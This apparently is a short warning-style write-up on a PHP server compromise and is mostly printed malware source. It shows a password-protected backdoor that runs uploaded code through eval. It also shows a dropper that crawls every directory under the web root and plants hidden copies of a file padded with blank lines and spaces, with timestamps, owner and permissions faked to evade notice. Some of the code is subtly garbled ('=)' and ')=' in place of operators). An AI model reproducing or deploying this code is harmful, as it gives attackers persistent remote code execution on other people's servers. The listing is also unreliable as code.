| |
This is the malcode: a backdoor to your server. | |
--------------------------------- BASE64CODE ------------------------ <?php error_reporting(1); global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3") { if ($code = @fread(@fopen( $HTTP_POST_FILES["f"]["tmp_name"],"rb"), $HTTP_POST_FILES["f"]["size"])) { eval($code); } else { testdata('f'); }; } else { testdata('pass'); }; testdata('end'); echo "</pre>"; ?> --------------------------------- END ------------------------ | |
This is the Just_a_test PHP code that is sent to your server once: | |
<?php error_reporting(1); global $HTTP_SERVER_VARS; $START = time(); $WD_TIMEOUT = array(8,7,6,6,5,5,5,5,0); function my_fwrite($f,$data) { global $CURFILE; $file_mtime = @filemtime($f); $file_atime = @fileatime($f); $dir_mtime = @filemtime(@dirname($f)); $dir_atime = @fileatime(@dirname($f)); if ($file_h = @fopen($f,"wb")) { @fwrite($file_h,$data); @fclose($file_h); if ($file_mtime) { @touch($f,$file_mtime,$file_atime); } elseif(@filemtime($CURFILE)) { @chmod($f,@fileperms($CURFILE)); @touch($f,@filemtime($CURFILE),@fileatime($CURFILE)); @chgrp($f,@filegroup($CURFILE)); @chown($f,@fileowner($CURFILE)); }; if ($dir_mtime) @touch(@dirname($f),$dir_mtime,$dir_atime); return $f; } else { return ''; }; }; function ext($f) { return substr($f, strrpos($f, ".") + 1); }; | |
... which then scans all of your server's directories: | |
function walkdir($p,$func='_walkdir',$l=0) { global $START; global $WD_TIMEOUT; global $FL; $func_f = "{$func}_f"; $func_d = "{$func}_d"; $func_s = "{$func}_s"; $func_e = "{$func}_e"; if ($dh = @opendir("$p")) { if (function_exists($func_s)) { if ($func_s($p,$l)) return 1; }; while ($f = @readdir($dh)) { if (time() - $START )= $WD_TIMEOUT[$l] ) break; if ($f == '.' || $f == '..' ) continue; if (@is_dir ("$p$f/") ) walkdir("$p$f/",$func,$l+1); if (@is_dir ("$p$f/") && function_exists($func_d)) $func_d("$p$f/",$l); if (@is_file("$p$f" ) && function_exists($func_f)) $func_f("$p$f" ,$l); }; closedir($dh); if (function_exists($func_e)) $func_e($p,$l); }; }; function r_cut($p) { global $R; return substr($p,strlen($R)); }; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; $R = $HTTP_SERVER_VARS['DOCUMENT_ROOT']; $CURFILE = $HTTP_SERVER_VARS['DOCUMENT_ROOT'].$HTTP_SERVER_VARS['SCRIPT_NAME']; echo "<pre>"; testdata('start'); $fe = ext($CURFILE); if (!$fe) $fe = 'php'; $FN = "namogofer.$fe"; function _walkdir_s($d,$l) { global $FCNT; $FCNT = array('fn' =) '','dir' =) 0,'file' =) 0,'simtype' =) 0); }; function _walkdir_d($d,$l) { global $FCNT; $FCNT['dir' ]++; }; function _walkdir_f($f,$l) { global $FCNT; $FCNT['file']++; if (ext($f) == ext($CURFILE)) $FCNT['simtype']++; }; |
|
At this point the Just_a_test zombie code is written all over your server (the base64-encoded payload is omitted from the listing below): |
function _walkdir_e($d,$l) { global $C,$FCNT,$FN; if ($C[$l](7) { if (my_fwrite("$d$FN", str_repeat("\n",100) // Hide Code with 100 empty lines .str_repeat(' ',150) // Hide Code with 150 spaces //----------- Malcode is Here: ------------------------------ .base64_decode('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') .str_repeat(' ',150) // Hide Code with 150 spaces ."\n".str_repeat("\n",100))) // Hide Code with 100 empty lines { $C[$l]++; $FCNT['fn'] = r_cut("$d$FN"); say(implode("\t",$FCNT)); }; }; }; walkdir("$R/"); testdata('end'); echo "(/pre)"; ?>